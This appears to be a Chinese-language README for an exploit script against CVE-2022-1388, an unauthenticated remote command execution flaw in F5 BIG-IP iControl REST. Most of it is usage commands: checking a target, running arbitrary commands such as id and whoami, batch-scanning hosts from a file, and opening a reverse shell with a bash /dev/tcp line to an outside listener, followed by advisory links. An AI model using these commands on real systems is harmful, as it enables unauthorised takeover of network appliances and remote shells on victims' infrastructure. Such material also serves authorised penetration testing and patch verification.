
CVE-2022-1388 F5 BIG-IP iControl REST RCE
该漏洞可能允许未经身份验证的攻击者通过管理端口和/或自IP地址对BIG-IP系统进行网络访问,从而执行任意系统命令、创建或删除文件或禁用服务。
基本用法
python3 CVE_2022_1388.py

漏洞验证
python3 CVE_2022_1388.py -v true -u https://192.168.17.200

命令执行
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

批量扫描
python3 CVE_2022_1388.py -s true -f check.txt

反弹 Shell
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"


https://support.f5.com/csp/article/K23605346
https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw
https://twitter.com/jas502n/status/1523611433938059265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr